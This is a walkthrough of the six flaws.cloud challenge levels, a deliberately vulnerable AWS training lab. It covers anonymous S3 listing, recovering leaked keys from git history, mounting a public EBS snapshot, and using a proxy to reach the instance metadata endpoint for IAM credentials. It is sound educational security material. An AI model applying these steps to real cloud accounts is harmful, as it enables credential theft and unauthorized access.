flaws.cloud is a collection of CTF-like challenges designed for beginners to learn about common misconfigurations in AWS. It consists of six levels of increasing difficulty, each providing clear explanations of hints and vulnerabilities.

Just in case you want to jump to the solutions, use the following links:

• Level 1

• Level 2

• Level 3

• Level 4

• Level 5

• Level 6

Level 1

Solution: To verify whether a domain is hosted on an AWS S3 bucket, conduct a DNS lookup on the domain name and utilize the resulting IP address for a reverse DNS lookup.

nslookup flaws.cloud

nslookup -type=ptr 52.92.209.12

The AWS region can be noticed from the above output, which is us-west-2. An S3 bucket hosting a website must have the same name as the domain to correctly function. Attempt to determine if the S3 bucket “flaws.cloud” is accessible. Use the following command to list the S3 bucket anonymously:

aws s3 ls s3://flaws.cloud --no-sign-request

Alternatively, you can visit the translated URL of the S3 bucket, which should be in the following format. The required region for the URL can be noted from the nslookup output.

http://<bucket-name>.s3.<region>.amazonaws.com
http://<bucket-name>.s3.amazonaws.com
http://s3.<region>.amazonaws.com/<bucket-name>

Level 2

Solution: Accessing the page http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud.s3.us-west-2.amazonaws.com/ to list the files shows access denied. So, this time, one can’t access the listing anonymously and any IAM users without permissions to s3:ListBucket / s3:GetObject also can’t access the buckets.

aws --profile PROFILE s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Configure any valid AWS access keys that has the permissions to access the buckets using command aws configure and then try listing the bucket.

aws --profile PROFILE s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Level 3

Solution: Listing the S3 bucket shows the presence of a .git file. Download the files using the command:

aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ .

Git logs shows that there was mistake in the first commit, so retrieve the files from first commit using the command:

git log

git checkout <commit id>

A file named access_keys.txt was fetched, which contains the access key and secret access key.

Now, configure the AWS CLI for the profile named “flaws” using the following command:

aws configure --profile flaws

Try the following command to list the buckets:

aws --profile flaws s3 ls

Output contains the link to level4.

Level 4

Solution: The command aws --profile flaws ec2 describe-snapshots retrieves all the snapshots accessible by the “flaws” profile, which is configured using the credentials obtained from level3.

You need to pass the AWS account ID along with the above command to fetch snapshots of that account. To get the Account ID:

aws --profile flaws sts get-caller-identity

Use the Account ID mentioned above to fetch the snapshots of the target account (using the --owner-id flag).

aws --profile flaws ec2 describe-snapshots --owner-id 975426262029

To verify whether the above EBS snapshot is public or not, use the following command:

aws --profile flaws ec2 describe-snapshot-attribute --snapshot-id SNAPSHOTID --attribute createVolumePermission

'Group': 'all' indicates that the snapshot is set to be public, allowing all AWS accounts to create volumes from it. To mount the snapshot, create a new volume in your own account using the following command:

aws ec2 create-volume --availability-zone us-west-2b --region us-west-2 --snapshot-id SNAPSHOTID

Now, create an EC2 instance using the AWS Management Console in the same region as the volume, i.e., us-west-2. Then, from the console, attach the volume to an instance to use it as you would a regular physical hard disk drive.

To connect to the instance using SSH, follow the instructions provided by AWS.

Now using the terminal, mount the volume created from the snapshot.

In the home directory, there is a bash script to create a password file for NGINX authentication. It contains the hardcoded username and password. Use these credentials to log in for level 5.

Level 5

Solution: Instance is using a proxy that follows a specific format to connect to the targeted URL.

"http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/" + "proxy/" + "<target url>"

The links provided in the description redirect to the target domain, allowing access to any domain from the EC2 instance as a proxy. So use it to access the magic IP 169.254.169.254 which is only allowed to access from EC2 instances.

This magic address can be used to access instance metadata. Instance metadata provides information about your instance that you can utilize to configure or manage the running instance. Instance metadata is divided into categories, such as hostname, events, and security groups.

"http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/" + "proxy/" + "169.254.169.254"

You will stumble upon two credentials are at different locations, i.e.:

• http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

• http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

Configure the temporary credentials returned from /security-credentials/ endpoint using aws configure --profile level5-flaws command.

aws --profile level5-flaws s3 ls s3://BUCKET

Level6 can be accessed at the directory ddcc78ff/.

Level 6

Solution: Use the following command to list attached user policies for the user named “level6” under the AWS profile “level6“.

aws --profile level6 iam list-attached-user-policies --user-name level6

This command lists two policies with their PolicyName and PolicyArn.

aws --profile level6 iam list-attached-user-policies --user-name level6

get-policy retrieves information about the specified managed policy, including the policy’s default version and the total number of IAM users, groups, and roles to which the policy is attached. To obtain the actual policy document for a specific version of the policy, use get-policy-version.

aws --profile level6 iam get-policy --policy-arn ARN

get-policy-version retrieves a specific version of an IAM policy. This policy version contains a set of permissions granted to the user “level6”.

aws --profile level6 iam get-policy-version --version-id v1 --policy-arn ARN

The list_apigateways policy might grant permission to API Gateway resources. Let’s take a look at the custom policy attached to this IAM user.

aws --profile level6 iam get-policy --policy-arn ARN

aws --profile level6 iam get-policy-version --version-id v4 --policy-arn ARN

The AWS API Gateway service enables you to create, publish, maintain, monitor, and secure APIs at any scale. It can be integrated with AWS Lambda to create serverless APIs, as well as with many other services such as DynamoDB, S3, and EC2.

Lambda functions can be invoked directly from API Gateway endpoints. The list-functions command shows the presence of the Level6 function.

aws --profile level6 lambda list-functions

Function policy shows that it can be invoked through the API gateway service.

aws --profile level6 lambda get-policy --function-name Level6

To invoke the function, you would need to make an HTTP GET request to the appropriate endpoint of the API Gateway, with a path matching /level6.

API Gateway URLs have the pattern: https://{api-id}.execute-api.{region}.amazonaws.com/{stage}

To get the stage name, use the following command:

aws --profile level6 apigateway get-stages --rest-api-id RESTAPIID

The final URL for API gateway endpoint will be: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

This page just tells to visit http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/

On visiting the final URL, we complete the final challenge.